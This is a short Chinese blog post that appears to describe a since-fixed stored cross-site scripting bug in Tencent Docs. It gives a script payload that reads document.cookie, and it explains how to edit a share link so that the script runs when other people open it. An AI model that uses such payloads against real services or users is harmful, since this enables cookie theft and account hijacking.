日期:2021.9.3
腾讯文档 doc.qq.com
复现过程:
先在腾讯文档新建一份空文档(在线表格),内容填:
</script><script>alert(document.cookie)</script>
保存后分享,正常分享链接 https://docs.qq.com/sheet/DSG13VmhlYVNIYUJs?tab=BB08J2
将分享连接改为 https://docs.qq.com/blankpage/DSG13VmhlYVNIYUJs
然后分享给别人,别人点开后就会触发xss了
可惜这玩意是见光死,群里正在狂欢的时候,不到一小时就发现此漏洞已修复。(不排除有内鬼)
没有评论:
发表评论